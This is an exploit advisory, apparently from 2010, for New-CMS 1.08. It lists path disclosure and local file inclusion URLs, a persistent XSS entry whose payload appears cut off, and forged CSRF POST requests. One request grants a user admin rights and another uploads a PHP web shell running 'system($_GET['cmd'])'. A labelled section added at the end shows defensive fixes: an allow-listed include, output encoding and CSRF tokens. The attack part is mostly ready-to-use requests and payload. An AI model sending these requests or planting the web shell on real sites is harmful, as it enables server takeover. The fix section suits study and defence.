
New-CMS v1.08 Multiple Vulnerability

Posted on 30 April 2010

====================================
New-CMS v1.08 Multiple Vulnerability
====================================

# [Vendor SW]: New-CMS
# [Version]: 1.08 (but possibly all versions)
# [Vendor URL]: www.new-cms.org
# [Tested on]: Ubuntu Server 9.10
# [Category]: Webapps/0day
#
# [Date]: 17 Feb 2010
# [Author]: Alberto "fulgur" Fontanella
# [Author URL]: ictsec.wordpress.com
# [Author EMAIL]: itsicurezza<0x40>yahoo.it
#

[ 1 ] - [ Full Path Disclosure ]

http://[host]/struttura/ricerca.php
http://[host]/pdf.php
http://[host]/index.php?lng=it&pg=manager
...etc

Fatal error: Call to undefined function ListaFile() in /var/www/struttura/ricerca.php on line 8

[ 2 ] - [ Local File Inclusion ]

http://[host]/index.php?pg=cmd
You have to put cmd.php in /struttura/

http://[host]/pdf.php?lng=cmd.php
http://[host]/newcms/struttura/manager.php?lng=cmd.php
http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php
...etc
You have to put cmd.php.str in /lingue/

[ 3 ] - [ Persistent XSS ]

Write an Article/News and put in the Title field: ">

[ 4 ] - [ XSRF ]

To give privileges to a User Account:

POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/index.php?lng=it&pg=admin&s=redattori
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on

To upload a PHP Shell:

POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1
Host: [host]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/struttura/manager.php?lng=it&id=indirizzo_0
Content-Type: multipart/form-data; boundary=---------------------------213917452311081853951240913053
Content-Length: 424

-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="radice"

Content-Disposition: form-data; name="per"

-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="file"; filename="cmd9.php"
Content-Type: application/x-httpd-php

<?php system($_GET['cmd']); ?>
-----------------------------213917452311081853951240913053--

# Inj3ct0r.com [2010-04-30]
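The fixes a maintainer would apply to the classes of bug listed above ([ 2 ], [ 3 ] and [ 4 ]), as an added illustration that is not the advisory's or New-CMS's own code. The CMS source is not on the page, so the "vulnerable shape" of the include, the `BASE_DIR`/`lingue` layout and the `['it', 'en']` language list are assumptions drawn from the PoC URLs.

```php
<?php
// Added example, not New-CMS source. The CMS's real include logic is not on the
// page; the "vulnerable shape" below is assumed from the PoC URLs
// (index.php?pg=cmd -> struttura/cmd.php, pdf.php?lng=X -> lingue/X.str).
const BASE_DIR = __DIR__;

// Assumed vulnerable shape: whatever arrives in "lng" selects the included file.
function load_language_vulnerable(string $lng): void
{
    include BASE_DIR . '/lingue/' . $lng . '.str';   // lng=cmd.php -> lingue/cmd.php.str
}

// Hardened: map the parameter onto a fixed allow-list, then confirm the resolved
// path really lies inside the language directory before including it.
function resolve_language_file(string $lng): ?string
{
    $allowed = ['it', 'en'];                          // languages the site ships (assumed)
    if (!in_array($lng, $allowed, true)) {
        return null;                                  // unknown value: use the default, never include it
    }
    $dir  = realpath(BASE_DIR . '/lingue');
    $path = realpath(BASE_DIR . '/lingue/' . $lng . '.str');
    if ($dir === false || $path === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Persistent XSS ([ 3 ]): encode the stored title on output, quotes included.
function render_title(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// XSRF ([ 4 ]): the forged POSTs contain nothing the attacker cannot guess, so
// bind every state-changing request to a per-session random token
// (assumes session_start() has already run).
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
function csrf_check(array $post): bool
{
    return isset($post['csrf'], $_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], (string) $post['csrf']);
}
// Admin/upload handlers: if (!csrf_check($_POST)) { http_response_code(403); exit; }
```

The Full Path Disclosure entry ([ 1 ]) needs no code: the production PHP configuration should run with display_errors=Off and log errors instead of rendering them.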
